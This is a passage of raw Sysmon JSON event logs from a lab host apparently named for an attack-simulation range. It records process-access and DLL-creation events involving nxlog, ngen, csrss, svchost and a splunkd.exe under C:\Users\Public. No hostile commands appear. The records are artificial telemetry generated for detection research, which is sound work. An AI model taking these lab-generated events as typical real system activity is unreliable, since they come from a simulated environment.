(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:21.554","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6926,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:59:21.773\r\nProcessGuid: {E2A3D6B1-12C4-5F25-0000-00103CD40900}\r\nProcessId: 2604\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a2c-0\\System.Xml.dll\r\nCreationUtcTime: 2020-08-01 06:59:21.773","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:59:21.773","ProcessGuid":"{E2A3D6B1-12C4-5F25-0000-00103CD40900}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a2c-0\\System.Xml.dll","CreationUtcTime":"2020-08-01 06:59:21.773","EventReceivedTime":"2020-08-01 06:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6927,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:21.898\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12C9-5F25-0000-0010A0D90900}\r\nTargetProcessId: 1004\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:21.898","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12C9-5F25-0000-0010A0D90900}","TargetProcessId":"1004","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6928,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:21.898\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12C9-5F25-0000-0010A0D90900}\r\nTargetProcessId: 1004\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:21.898","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12C9-5F25-0000-0010A0D90900}","TargetProcessId":"1004","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6929,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:21.914\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12C9-5F25-0000-0010A0D90900}\r\nTargetProcessId: 1004\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:21.914","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12C9-5F25-0000-0010A0D90900}","TargetProcessId":"1004","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6930,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:22.070\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12CA-5F25-0000-0010FEDC0900}\r\nTargetProcessId: 3220\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:22.070","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12CA-5F25-0000-0010FEDC0900}","TargetProcessId":"3220","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6931,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:22.070\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12CA-5F25-0000-0010FEDC0900}\r\nTargetProcessId: 3220\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:22.070","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12CA-5F25-0000-0010FEDC0900}","TargetProcessId":"3220","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6932,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:22.070\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12CA-5F25-0000-0010FEDC0900}\r\nTargetProcessId: 3220\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:22.070","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12CA-5F25-0000-0010FEDC0900}","TargetProcessId":"3220","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6933,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:22.554\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:22.554","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 